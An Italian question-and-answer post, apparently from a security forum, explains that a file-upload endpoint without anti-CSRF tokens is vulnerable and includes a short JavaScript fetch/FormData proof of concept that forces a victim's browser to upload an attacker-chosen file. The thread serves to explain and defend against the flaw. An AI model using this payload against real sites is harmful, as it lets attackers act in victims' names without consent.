È possibile eseguire attacchi CSRF sulla funzionalità di caricamento dei file? La mia applicazione carica i file inviando richieste POST multipart / form-data senza alcun token casuale. È possibile preparare un modulo HTML che dimostrerà questo attacco all'applicazione?
Sì, sei vulnerabile. Ogni endpoint che modifica lo stato del server deve avere protezione contro gli attacchi CSRF. I caricamenti di file non sono esclusi.
Quindi, come può essere sfruttato? Se il tuo sito è example.com , l'autore dell'attacco ospita un JS come questo su un sito che lei induce la vittima a visitare:
myFormData = new FormData();
myFormData.append("file", fileContent, "filename.txt");
fetch("http://example.com/fileupload.php", {
method: "post",
body: myFormData
});
Questo farà sì che il browser delle vittime invii una richiesta POST al tuo sito, con qualsiasi cosa l'hacker scelga come fileContent come file.
Leggi altre domande sui tag web-application csrf file-upload